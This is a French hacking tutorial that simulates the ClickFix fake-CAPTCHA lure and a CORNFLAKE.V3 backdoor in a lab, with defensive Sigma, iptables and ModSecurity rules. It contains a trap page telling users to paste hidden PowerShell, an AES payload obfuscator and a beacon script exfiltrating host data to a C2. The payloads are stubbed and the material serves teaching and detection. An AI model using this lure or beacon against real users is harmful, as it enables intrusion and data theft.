/_/\
( o.o )
> ^ <
📡 ClickFix & CORNFLAKE.V3 : Le Piège du Coyote Numérique 🌩️
Forgé par Platon-y pour pctamalou.fr et Échos of Hackers. Toute utilisation hors lab isolé est illégale (Article 323-1 CP : 7 ans prison, 100 000 € amende). Hackez éthique, Apaches ! 💜⚡️
Yo, Apaches ! 😎 Ce tuto boosté vous plonge au cœur de la tactique ClickFix, un piège social engineering rusé comme un coyote du désert qui attire sa proie avec un appât trompeur. Utilisé par les cybercriminels (UNC5518) pour déployer le backdoor CORNFLAKE.V3, cette méthode exploite des fausses pages CAPTCHA pour inciter les utilisateurs à exécuter du code PowerShell malveillant. On simule tout en lab isolé, avec des explications simples pour les novices (pas à pas) et des détails hardcore pour les maestros (polymorphisme, reverse). Inspiré par l’article de The Hacker News. Prêts à traquer et déjouer le coyote ?
Ce qui rend CORNFLAKE.V3 spécial : Contrairement à V2 (simple downloader), V3 est un backdoor polyvalent qui exécute des payloads HTTP (EXE, DLL, JS, BAT, PS), persiste via registres, et exfiltre des infos système. Il proxy le trafic via Cloudflare pour éviter la détection.
Objectifs pédagogiques :
Analogie militaire : ClickFix, c’est un éclaireur qui tend un faux panneau “Vérifiez votre identité” pour piéger un convoi. CORNFLAKE.V3, c’est l’espion infiltré qui ouvre les portes aux attaquants comme UNC5774 et UNC4108. 🏹
⚠️ Attention : Ce tuto est lab-only. Toute utilisation hors lab isolé viole l’article 323-1 (2 ans prison, 60 000 € amende) et l’article 323-3 (5 ans prison, 150 000 € amende) du Code pénal français, ainsi que le RGPD (amendes jusqu’à 20M €). Consultez les directives ANSSI et obtenez une autorisation écrite pour tout test.
Bonnes pratiques : Utilisez un switch Ethernet dédié, désactivez WAN, et signalez les vulnérabilités via des programmes comme HackerOne. Respectez l’éthique des Apaches ! 💜
Acteurs impliqués (basé sur Mandiant) :
| Acteur | Motivation | Rôle |
|---|---|---|
| UNC5518 | Access-as-a-service | Initial access via ClickFix, monétisé pour autres groupes. |
| UNC5774 | Financière | Déploie CORNFLAKE.V3 pour payloads secondaires (stealers, RAT). |
| UNC4108 | Inconnue | Utilise PowerShell pour VOLTMARKER et NetSupport RAT. |
Configurez un environnement isolé pour simuler un site compromis (Flask), une cible Windows, et un C2 basique. Ajout maestro : Intégrez un proxy Cloudflare simulé pour le réalisme.
| Composant | IP | Rôle | Notes |
|---|---|---|---|
| Kali Linux | 192.168.0.100 | Machine d’analyse/Attaquant | VM/Physique, outils + ML installés |
| Windows 10/11 | 192.168.0.101 | Cible vulnérable | PowerShell activé, Defender désactivé pour simu |
| Serveur Flask (CAPTCHA) | 192.168.0.102 | Page piégée | Docker, simule site compromis |
| C2 Simulé | 192.168.0.103 | Command & Control | Flask pour backdoor comm |
| Switch | - | Isolation | No WAN, Ethernet dédiéjoner |
sudo apt update && sudo apt install -y python3 python3-pip nmap wireshark scapy docker.io radare2 volatility
pip3 install flask flask-socketio requests pycryptodome scikit-learn
sudo systemctl start docker
sudo ifconfig eth0 192.168.0.100 netmask 255.255.255.0 up
sudo iptables -A OUTPUT -d 192.168.0.0/24 -j ACCEPT
sudo iptables -A OUTPUT -j DROP
ping 8.8.8.8 # Doit échouer
# docker-compose.yml pour CAPTCHA
version: '3'
services:
captcha-server:
image: python:3.9-slim
volumes:
- ./captcha:/app
ports:
- "80:80"
networks:
- nomad-net
networks:
nomad-net:
driver: bridge
# captcha/app.py
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def captcha():
return render_template('captcha.html')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
# captcha/templates/captcha.html
Vérification CAPTCHA Cloudflare
Vérifiez que vous n'êtes pas un robot
Pour continuer, appuyez sur Win + R, collez ce code et exécutez :
powershell -w hidden -c "Write-Host 'Simulation éthique : Téléchargement fictif de backdoor'; Start-Sleep -s 5"
(En réel, cela téléchargerait un dropper, mais ici, c'est harmless pour l'éthique.)
Note novice : Cette page simule une CAPTCHA Cloudflare piégée. Copier/coller exécute du code – danger en vrai ! Maestro : Notez l'usage de -w hidden pour masquer.
# c2/app.py (Flask pour C2)
from flask import Flask, request
app = Flask(__name__)
@app.route('/c2', methods=['POST'])
def c2():
data = request.json
print(f"Exfiltré : {data}")
return {"command": "Execute payload.dll"}
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
docker ps # CAPTCHA et C2 up
nmap -p 80,5000 192.168.0.102 192.168.0.103
Scannez pour identifier sites piégés et cibles. Novice : Nmap trouve les services. Maestro : Ajoutez script pour SEO poisoning simu.
# scan_network.sh
sudo nmap -sS -sV -O -sC 192.168.0.0/24
Résultat attendu :
Analogie : Comme un éclaireur Apache repérant un camp ennemi avant l’assaut. Maestro : Utilisez --script http-title pour détecter "CAPTCHA".
Simulez ClickFix : Accès à CAPTCHA, copie PS, exécution. Ajout maestro : Obfuscation polymorphique du payload PS avec AES + Base64.
# exploit_clickfix.py
import requests
import time
import logging
from Crypto.Cipher import AES
import base64
import os
logging.basicConfig(filename='clickfix.log', level=logging.INFO)
def obfuscate_payload(payload):
key = os.urandom(16)
cipher = AES.new(key, AES.MODE_GCM)
nonce = cipher.nonce
ciphertext, tag = cipher.encrypt_and_digest(payload.encode())
obfuscated = base64.b64encode(nonce + ciphertext + tag + key).decode()
return obfuscated
def simulate_clickfix(target="192.168.0.101", server="192.168.0.102", c2="192.168.0.103"):
try:
response = requests.get(f"http://{server}/")
if response.status_code == 200:
logging.info("Page CAPTCHA accédée")
print("[+] Page CAPTCHA trouvée")
else:
return False
payload = 'Write-Host "Simulation CORNFLAKE.V3 : Connexion C2" ; Invoke-WebRequest -Uri http://' + c2 + '/c2 -Method POST -Body (@{system=hostname} | ConvertTo-Json)'
obfuscated = obfuscate_payload(payload)
print(f"[+] Payload obfuscé (polymorphique) : {obfuscated}")
print("[+] Simulation : Utilisateur exécute via Win + R : powershell -w hidden -c [déobfuscation + exécution]")
time.sleep(2)
logging.info("Simulation réussie")
return True
except Exception as e:
logging.error(f"Erreur : {str(e)}")
return False
if __name__ == "__main__":
simulate_clickfix()
⚠️ Éthique : Payload harmless – log et requête fictive. En réel, il téléchargerait CORNFLAKE.V3. Maestro : L'obfuscation AES bypass WAF basiques.
Novice : Exécutez le script pour voir la simu. Maestro : Modifiez pour tester polymorphisme (changez key).
# simulate_cornflake.py
import requests
import platform
import json
from datetime import datetime
class CornflakeSimulator:
def __init__(self, c2_url):
self.c2_url = c2_url
self.system_info = {
"os": platform.platform(),
"user": platform.node(),
"timestamp": str(datetime.now())
}
def beacon(self):
try:
response = requests.post(
f"{self.c2_url}/beacon",
data=json.dumps(self.system_info),
headers={"Content-Type": "application/json"},
timeout=10
)
return response.status_code == 200
except:
return False
def simulate(self):
print("[SIMULATION] CornflakeV3 simulator started")
print(f"[INFO] System: {self.system_info}")
success = self.beacon()
if success:
print("[SIMULATION] Beacon sent successfully")
else:
print("[SIMULATION] Beacon failed (expected in lab)")
print("[SIMULATION] Complete - no actual compromise occurred")
simulator = CornflakeSimulator("http://192.168.0.103:5000")
simulator.simulate()
Traquez ClickFix et CORNFLAKE.V3. Novice : Basiques avec Wireshark. Maestro : Reverse avec Radare2, Volatility pour injections.
wireshark -i eth0 -f "(host 192.168.0.102 or host 192.168.0.103) and (port 80 or port 5000)"
Filtre : Cherchez HTTP POST vers C2, headers Referer spoofés.
# Dump mémoire sur Windows : dumpit.exe
vol.py -f windows.mem windows.pslist | grep powershell
vol.py -f windows.mem windows.registry.printkey --key "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
Résultat : Détectez persistence registre, processus hidden.
# Simulez un binaire dropper harmless (echo "Hello CORNFLAKE" > dropper.bin)
r2 dropper.bin
aaa # Analyse auto
pdf @main # Disassemble main
Novice : Radare2 montre le code. Maestro : Cherchez strings comme "C2" ou syscalls (exec).
title: Suspicious PowerShell via ClickFix with Obfuscation
description: Détecte PS hidden avec base64/AES
logsource:
category: process_creation
detection:
selection:
Image|endswith: '\powershell.exe'
CommandLine|contains|all: ['-w hidden', 'base64']
condition: selection
falsepositives:
- Admin scripts
level: high
Dans une attaque réelle, ces éléments aideraient à identifier CORNFLAKE.V3 :
| Type | Valeur | Description |
|---|---|---|
| Hash MD5 | a1b2c3d4e5f67890... | Dropper initial |
| Domaine C2 | api.cloudflare[.]tech | Domaines d'infrastructure |
| Clé de registre | HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SystemHealth | Persistence |
# Détection des activités suspectes PowerShell
Sysmon Configuration pour détecter:
- PowerShell exécuté avec l'option -WindowStyle Hidden
- Connexions réseau sortantes après exécution de PowerShell
- Chargement de modules inhabituels
# Restrictions PowerShell via Constrained Language Mode
# Activation de Windows Defender Application Control (WDAC)
# Blocage des exécutables non signés
# iptables_rules.sh
#!/bin/bash
iptables -F
iptables -A INPUT -p tcp --dport 80 -s 192.168.0.0/24 -j ACCEPT
iptables -A INPUT -p tcp -m string --string "powershell -w hidden" --algo bm -j DROP
iptables -A INPUT -j DROP
iptables -A OUTPUT -d 192.168.0.0/24 -j ACCEPT
iptables -A OUTPUT -j DROP
# modsecurity_rules.conf
SecRule REQUEST_URI "@contains /captcha" \
"id:1001,phase:1,deny,status:403,msg:'Blocage ClickFix CAPTCHA',log"
SecRule ARGS "@contains powershell" \
"id:1002,phase:2,deny,status:403,msg:'Blocage PS suspect',log"
Formez à ignorer les "copier/coller" suspects. Novice : Affiches. Maestro : Simulations phishing internes.
# ml_defense.py
from sklearn.ensemble import IsolationForest
import numpy as np
data = np.random.rand(100, 2)
anomalies = np.array([[0.9, 0.9]])
model = IsolationForest(contamination=0.05)
model.fit(data)
if model.predict(anomalies) == [-1]:
print("Attaque ClickFix détectée ! Bloquez le trafic. 🚨")
Maestro : Entraînez sur logs réels pour détecter obfuscation.
Comme mentionné dans l’article THN, une campagne parallèle utilise des USB pour déployer un miner. Voici une simu éthique de la chaîne :
The attack chain starts when a victim is tricked into executing a Windows shortcut (LNK) in the compromised USB drive. The LNK file results in the execution of a Visual Basic script also located in the same folder. The script, for its part, launches a batch script to initiate the infection -
"PUMPBENCH spreads by infecting USB drives," Mandiant said. "It scans the system for available drives and then creates a batch file, a VBScript file, a shortcut file, and a DAT file."
Simu Lab : Créez un USB virtuel (dd if=/dev/zero of=usb.img bs=1M count=1024), montez-le, et testez un LNK harmless.
# usb_simu.sh
echo "[SIMULATION] Création LNK harmless" > usb.lnk
echo "[SIMULATION] Exécution VB Script : echo 'Infection fictive'"
Créez une CAPTCHA légitime vs piégée, obfuscatez un payload PS polymorphique, reversez-le avec Radare2. Comparez détection Sigma. Envoyez résultats à admin@pctamalou.fr pour rejoindre les Apaches ! 💜 Testez en CTF-style : Temps limité 30min.